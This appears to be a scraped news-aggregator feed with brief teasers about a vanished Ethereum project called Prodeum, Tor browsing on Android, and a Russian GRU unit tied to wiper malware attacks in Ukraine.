A short-lived and relatively unknown cryptocurrency project built on Ethereum called Prodeum disappeared this weekend—along with the money a small number of hapless investors sunk into it. All that remained of its website was a white page with the word “penis” written on it.
...morePublished: 2019-03-07 22:08:58
Popularity: None
Author: Ryan Whitwam
For years, you've been able to connect to the Tor Network on Android using Orbot and browse using Orfox. Now, you can get the privacy and security... by Ryan Whitwam in Applications, News
...morePublished: 2024-09-05 18:41:02
Popularity: 21
Author: Ryan Naraine
Keywords:
A secretive Russian military unit, previously linked to assassinations and destabilization in Europe, is blamed for destructive wiper malware attacks in Ukraine. The post Russian GRU Unit Tied to Assassinations Linked to Global Cyber Sabotage and Espionage appeared first on SecurityWeek.
...more